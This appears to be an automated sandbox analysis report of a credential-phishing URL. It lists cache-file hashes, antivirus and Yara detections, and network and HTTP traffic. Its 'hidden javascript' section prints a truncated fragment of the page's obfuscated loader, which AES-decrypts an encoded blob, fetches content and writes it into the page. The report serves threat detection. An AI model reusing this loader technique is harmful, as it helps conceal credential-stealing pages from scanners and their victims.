Chrome Cache Entry: 181	ASCII text, with very long lines (52276)	C43CD173EEEBA2F72AA6B431D06B8C07	427A692F7F39EABB3D5B8510AEE2743025DAF813	C880EB3D25C765D399840AA204FEC22B3230310991089F14781F09A35ED80B8A
Chrome Cache Entry: 182	ASCII text, with very long lines (47671)	EC4B20037C896C5F60640105C6EA36B1	A9A74169679305B6EF1B76470F5CB746D9420213	FBACCE424D00878284DB8C04089F007944324D9CD2432DB2472E4CF62A39DBBF
Chrome Cache Entry: 183	JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=1], baseline, precision 8, 474x315, components 3	5E686CE6CEA339C742C618A7613FFC3E	83109E93F7920C433142EC3F7C946434AC22BF9A	2FD5B02FE15846BA05FB434C0896DDEC531E34EC5FA8292E984E03560BE8BBFA
Chrome Cache Entry: 184	JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=1], baseline, precision 8, 474x266, components 3	27468C38116C94B229FFD3BEABE5A199	78EA9027A989BEB96D274F30733F82351F122E53	2BA6280E3B467708707A4B4AC3771F9E4B5BDAAF6152289FED7377D1C743E28E
Chrome Cache Entry: 185	HTML document, ASCII text, with very long lines (611)	46DD133EE00DC1BAE5E4EEBA7B88432F	8AF86A4AC91CE48C062216FB94A6E1D57618A19B	9EB52EE46C7AB5EA4CA0982415DA99FDED1B7D7354F75E50847BDAE6CB44EB66
Chrome Cache Entry: 186	JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=1], baseline, precision 8, 474x350, components 3	32AE93A055B1A6319A32495B21D512E8	514B1DD267925957127162390AF568F70076A325	9ACF23016E68DD0FA6953E9925E89ADB0FFC4808CC0C017DFE6E43246AE8E268
Chrome Cache Entry: 187	ASCII text, with very long lines (47992), with no line terminators	CF3402D7483B127DED4069D651EA4A22	BDE186152457CACF9C35477B5BDDA5BCB56B1F45	EAB5D90A71736F267AF39FDF32CAA8C71673FD06703279B01E0F92B0D7BE0BFC
Chrome Cache Entry: 188	JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=1], baseline, precision 8, 474x315, components 3	B56D35E6C0340B677D561CF90C4EC3D4	9964E69E0199F772B19DDA8048B2F637C5E6D6BD	CF2E0A23D0C92F56500951D9BADEDF8A5F9E3E31D9F02CE6A046F9D88DC797E5
Chrome Cache Entry: 189	PNG image data, 44 x 39, 8-bit/color RGB, non-interlaced	30B0EFC270DED2E5F14DA2410E2A279E	3B6CB3B701A4DABEC6DC8351E2B81B19B7EF2317	A332A201300A259B31F688FC9B5C881522446A40691FA17C6CC5E996A19F8A0C
Chrome Cache Entry: 190	PNG image data, 96 x 96, 8-bit/color RGBA, non-interlaced	112AD5F84433E5F46D607F73FB64BD60	A8BF11F3F6099CA49D1CBF73C050EB7E6FBC68B4	0F84307AD691800E391FCCB42B4BA290A87FEBF001ABEDFBE03B34767D45E441
Chrome Cache Entry: 191	PNG image data, 83 x 34, 8-bit/color RGB, non-interlaced	4C7103858A8323A6EB0EF885235229EE	3838B2AE297A0E246E5F197C93339A342CD91B55	48175F389B9203CE2139074E313EDDC6DE5F0ECD24025B70488884D897681735
Chrome Cache Entry: 192	JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=1], baseline, precision 8, 474x350, components 3	32AE93A055B1A6319A32495B21D512E8	514B1DD267925957127162390AF568F70076A325	9ACF23016E68DD0FA6953E9925E89ADB0FFC4808CC0C017DFE6E43246AE8E268
Chrome Cache Entry: 193	Web Open Font Format (Version 2), TrueType, length 156532, version 773.256	D465BCCB9EDF0873F021F66D4B09D89C	214F3C71DE28C682602AECD39E9AD2BBA15F1B0C	F4C5A5B297E623BC159679563A4D1EB16E409CA3B57698FBC00FD2C907DADAE0
Chrome Cache Entry: 194	JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=1], baseline, precision 8, 474x266, components 3	40191566C60631C08C3F2B487EB2D0A3	C27414542DF9F6B597B07F5A27E10C90E28D0517	785728D3F6DDE045F41AC93845C4D39567509AB10133BD4B4E570ECFAE76F035
Chrome Cache Entry: 195	HTML document, ASCII text, with very long lines (522), with CRLF line terminators	222BBF8D7DBA21AA89CA1A43101A21F2	432B4A6534FAFD054DDEF9856D122767623A08F1	FA002E1D5C1AF7B756120C0802EBC99667FE273CDD665DA2582A3C8BEA5AE61A
Chrome Cache Entry: 196	JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=1], baseline, precision 8, 474x350, components 3	32AE93A055B1A6319A32495B21D512E8	514B1DD267925957127162390AF568F70076A325	9ACF23016E68DD0FA6953E9925E89ADB0FFC4808CC0C017DFE6E43246AE8E268
Chrome Cache Entry: 197	PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced	9246CCA8FC3C00F50035F28E9F6B7F7D	3AA538440F70873B574F40CD793060F53EC17A5D	C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
Chrome Cache Entry: 198	JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=1], baseline, precision 8, 474x315, components 3	5E686CE6CEA339C742C618A7613FFC3E	83109E93F7920C433142EC3F7C946434AC22BF9A	2FD5B02FE15846BA05FB434C0896DDEC531E34EC5FA8292E984E03560BE8BBFA
Chrome Cache Entry: 199	ASCII text, with very long lines (52276)	C43CD173EEEBA2F72AA6B431D06B8C07	427A692F7F39EABB3D5B8510AEE2743025DAF813	C880EB3D25C765D399840AA204FEC22B3230310991089F14781F09A35ED80B8A
Chrome Cache Entry: 200	JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=1], baseline, precision 8, 474x355, components 3	68E3D35617E577F900BB6DF9244EAD95	442E858B1FF330F1CF45947F360EFD3D5AF8EEF9	964A0E03C6993374109110CBE8C7BBC29BEC2EBE2885462F912BFBFBB8705795
Chrome Cache Entry: 201	Web Open Font Format (Version 2), TrueType, length 156532, version 773.256	D465BCCB9EDF0873F021F66D4B09D89C	214F3C71DE28C682602AECD39E9AD2BBA15F1B0C	F4C5A5B297E623BC159679563A4D1EB16E409CA3B57698FBC00FD2C907DADAE0
Chrome Cache Entry: 202	JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=1], baseline, precision 8, 474x296, components 3	723F518C995D53B262E99E8E3EFB4A5A	FBC0E39A100ED2496493023E68A0AF5D1B432320	0AF145F7825BF3FDACDCF6DE3978D971C4C0A6F07C6C01AE1064D7E9AA1D299F
Chrome Cache Entry: 203	ASCII text, with very long lines (47992), with no line terminators	CF3402D7483B127DED4069D651EA4A22	BDE186152457CACF9C35477B5BDDA5BCB56B1F45	EAB5D90A71736F267AF39FDF32CAA8C71673FD06703279B01E0F92B0D7BE0BFC
Chrome Cache Entry: 204	JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=1], baseline, precision 8, 474x316, components 3	5BD102B7AB3A62B9117207034C875F39	C01AC151DEC1BF81323246DF54AFF31449B2CC5A	123C5816BF4127F4E6C74C35C426AA3EBEB0B5422D4D86840578642A8E07AD35
Chrome Cache Entry: 205	HTML document, Unicode text, UTF-8 text, with very long lines (3407), with CRLF, LF line terminators	8397D89351D7144D012A5B34224B0D0C	9218CCDA63AA7FA0988C40A1EAB92EF0AAFF7B38	3F47B802D2815754255964437EEF844BFB53EAD4B5895709489EF9EDF560E5C5
Chrome Cache Entry: 206	Unicode text, UTF-8 text, with very long lines (65342)	A549AF2A81CD9900EE897D8BC9C4B5E9	C5AC1DEE961CB59A045256EC203F69E317872F7C	3C8F27E6009CCFD710A905E6DCF12D0EE3C6F2AC7DA05B0572D3E0D12E736FC8
Chrome Cache Entry: 207	ASCII text, with very long lines (47671)	EC4B20037C896C5F60640105C6EA36B1	A9A74169679305B6EF1B76470F5CB746D9420213	FBACCE424D00878284DB8C04089F007944324D9CD2432DB2472E4CF62A39DBBF

AV Detection

Antivirus / Scanner detection for submitted sample

Source: https://onlinepdf-qrsharedfile.com/index.html#XYW5uaWUua3lwcmlhbm91QGxjYXR0ZXJ0b24uY29t

SlashNext: detection malicious, Label: Credential Stealing type: Phishing & Social Engineering

Phishing

Yara detected HtmlPhish70

Source: Yara match	File source: 2.4.pages.csv, type: HTML
Source: Yara match	File source: 1.10.pages.csv, type: HTML
Source: Yara match	File source: 1.8.pages.csv, type: HTML
Source: Yara match	File source: dropped/chromecache_205, type: DROPPED
Source: Yara match	File source: dropped/chromecache_171, type: DROPPED

HTML page contains hidden javascript code

Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)

Source: https://onlinepdf-qrsharedfile.com/index.html?__cf_chl_rt_tk=XbRjo5Xq4Zr2fPHd95vNFX77QQSuPEGggp9UZs6Epi4-1729799015-1.0.1.1-VZntlvE7VRGZbOuoP83Tv8UkLycQictXRCj_l40D3n8#XYW5uaWUua3lwcmlhbm91QGxjYXR0ZXJ0b24uY29t	HTTP Parser: async function daffiness(tableland) { var {a,b,c,d} = json.parse(tableland); returncryptojs.aes.decrypt(a, cryptojs.pbkdf2(cryptojs.enc.hex.parse(d), cryptojs.enc.hex.parse(b), {hasher: cryptojs.algo.sha512, keysize: 64/8, iterations: 999}),{iv: cryptojs.enc.hex.parse(c)}).tostring(cryptojs.enc.utf8); } async functiongain(){ earphone.hidden = 0; napalm.hidden= 1; document.write(await daffiness(await(await fetch(await daffiness(atob(`eyjhijoicvurvxo4ohdwxc9ysllfm0fabtjlcdzknwuyd0hebfbaugxlzes2wg1yaza9iiwiyyi6ijq0odfmmjk1mjqwmmuzyzu4ntu4zjdlyzyzndgwnwfjiiwiyii6ijzlyze0mwy2zjy0ytu1mwq3yjjkmzmwmdaxmdrhnjk1zjlhzme1zgewndq5nmzjntk2zmzlntixzmnmmtywymqymzvmodnly2zlymqyzjkxogywmzeyodjmmtyzyjizztuxndu4mti5ytrlzmq3mty3ntbmmjrjyzazotbhytyzymq1ytixywe0mwvmyzblymy3mzyzm2fkn2m1n2zjntu3owrkmjy3yzmwzwuzmjixytazymzhmjbiodg5mtq2mjyxzji2ytvlotq4zta1mtnlotyyywrhowq2m2q2ymexyznjnwi3n2fmn2q3mjrhmwq3yjg1ztzlywu3nwrkztg5zwyyzjk3owu1nthiyjg1owywowe5n2u1y2rlmge2mwm4ztvkzmexzjgxzdbiyz...
Source: https://onlinepdf-qrsharedfile.com/index.html#XYW5uaWUua3lwcmlhbm91QGxjYXR0ZXJ0b24uY29t	HTTP Parser: async function daffiness(tableland) { var {a,b,c,d} = json.parse(tableland); returncryptojs.aes.decrypt(a, cryptojs.pbkdf2(cryptojs.enc.hex.parse(d), cryptojs.enc.hex.parse(b), {hasher: cryptojs.algo.sha512, keysize: 64/8, iterations: 999}),{iv: cryptojs.enc.hex.parse(c)}).tostring(cryptojs.enc.utf8); } async functiongain(){ earphone.hidden = 0; napalm.hidden= 1; document.write(await daffiness(await(await fetch(await daffiness(atob(`eyjhijoicvurvxo4ohdwxc9ysllfm0fabtjlcdzknwuyd0hebfbaugxlzes2wg1yaza9iiwiyyi6ijq0odfmmjk1mjqwmmuzyzu4ntu4zjdlyzyzndgwnwfjiiwiyii6ijzlyze0mwy2zjy0ytu1mwq3yjjkmzmwmdaxmdrhnjk1zjlhzme1zgewndq5nmzjntk2zmzlntixzmnmmtywymqymzvmodnly2zlymqyzjkxogywmzeyodjmmtyzyjizztuxndu4mti5ytrlzmq3mty3ntbmmjrjyzazotbhytyzymq1ytixywe0mwvmyzblymy3mzyzm2fkn2m1n2zjntu3owrkmjy3yzmwzwuzmjixytazymzhmjbiodg5mtq2mjyxzji2ytvlotq4zta1mtnlotyyywrhowq2m2q2ymexyznjnwi3n2fmn2q3mjrhmwq3yjg1ztzlywu3nwrkztg5zwyyzjk3owu1nthiyjg1owywowe5n2u1y2rlmge2mwm4ztvkzmexzjgxzdbiyz...

Source: https://onlinepdf-qrsharedfile.com/index.html?__cf_chl_rt_tk=XbRjo5Xq4Zr2fPHd95vNFX77QQSuPEGggp9UZs6Epi4-1729799015-1.0.1.1-VZntlvE7VRGZbOuoP83Tv8UkLycQictXRCj_l40D3n8#XYW5uaWUua3lwcmlhbm91QGxjYXR0ZXJ0b24uY29t	HTTP Parser: No favicon
Source: https://onlinepdf-qrsharedfile.com/index.html?__cf_chl_rt_tk=XbRjo5Xq4Zr2fPHd95vNFX77QQSuPEGggp9UZs6Epi4-1729799015-1.0.1.1-VZntlvE7VRGZbOuoP83Tv8UkLycQictXRCj_l40D3n8#XYW5uaWUua3lwcmlhbm91QGxjYXR0ZXJ0b24uY29t	HTTP Parser: No favicon
Source: https://onlinepdf-qrsharedfile.com/index.html?__cf_chl_rt_tk=XbRjo5Xq4Zr2fPHd95vNFX77QQSuPEGggp9UZs6Epi4-1729799015-1.0.1.1-VZntlvE7VRGZbOuoP83Tv8UkLycQictXRCj_l40D3n8#XYW5uaWUua3lwcmlhbm91QGxjYXR0ZXJ0b24uY29t	HTTP Parser: No favicon
Source: https://onlinepdf-qrsharedfile.com/index.html#XYW5uaWUua3lwcmlhbm91QGxjYXR0ZXJ0b24uY29t	HTTP Parser: No favicon
Source: https://onlinepdf-qrsharedfile.com/index.html#XYW5uaWUua3lwcmlhbm91QGxjYXR0ZXJ0b24uY29t	HTTP Parser: No favicon
Source: https://onlinepdf-qrsharedfile.com/index.html#XYW5uaWUua3lwcmlhbm91QGxjYXR0ZXJ0b24uY29t	HTTP Parser: No favicon
Source: https://onlinepdf-qrsharedfile.com/index.html?__cf_chl_tk=XbRjo5Xq4Zr2fPHd95vNFX77QQSuPEGggp9UZs6Epi4-1729799015-1.0.1.1-VZntlvE7VRGZbOuoP83Tv8UkLycQictXRCj_l40D3n8#XYW5uaWUua3lwcmlhbm91QGxjYXR0ZXJ0b24uY29t	HTTP Parser: No favicon
Source: https://pupsarebestde.ru//#contact	HTTP Parser: No favicon

Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49727 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.16:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.16:60695 version: TLS 1.2

Detected non-DNS traffic on DNS port

Source: global traffic

TCP traffic: 192.168.2.16:60665 -> 1.1.1.1:53

Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown	TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown	TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown	TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown	TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown	TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown	TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown	TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown	TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown	TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown	TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown	TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108

Source: global traffic	HTTP traffic detected: GET /index.html HTTP/1.1Host: onlinepdf-qrsharedfile.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /index.html HTTP/1.1Host: onlinepdf-qrsharedfile.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=8d7c74e579c6dd24 HTTP/1.1Host: onlinepdf-qrsharedfile.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://onlinepdf-qrsharedfile.com/index.html?__cf_chl_rt_tk=XbRjo5Xq4Zr2fPHd95vNFX77QQSuPEGggp9UZs6Epi4-1729799015-1.0.1.1-VZntlvE7VRGZbOuoP83Tv8UkLycQictXRCj_l40D3n8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /turnstile/v0/b/e1a56f38220d/api.js?onload=tDpp4&render=explicit HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://onlinepdf-qrsharedfile.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: onlinepdf-qrsharedfile.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://onlinepdf-qrsharedfile.com/index.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /turnstile/v0/b/e1a56f38220d/api.js?onload=tDpp4&render=explicit HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=8d7c74e579c6dd24 HTTP/1.1Host: onlinepdf-qrsharedfile.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/iq5m1/0x4AAAAAAADnPIDROrmt1Wwj/light/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8d7c750558594780&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/iq5m1/0x4AAAAAAADnPIDROrmt1Wwj/light/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/iq5m1/0x4AAAAAAADnPIDROrmt1Wwj/light/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1916946690:1729797150:TRiyx_MJd91XIRaek2QQT1kUoEY6p9Qno7I0j5ezJB8/8d7c74e579c6dd24/Ln0MKcwLkJ._mactG8XS7qHbwoMgxlbMVaN67RMxyUs-1729799015-1.2.1.1-XPRJnKgqBoBS18FVeWftwAkeInPsA24i539TseagB4uzKJFR.Y4lpb3o2yja7Y7w HTTP/1.1Host: onlinepdf-qrsharedfile.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8d7c750558594780&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
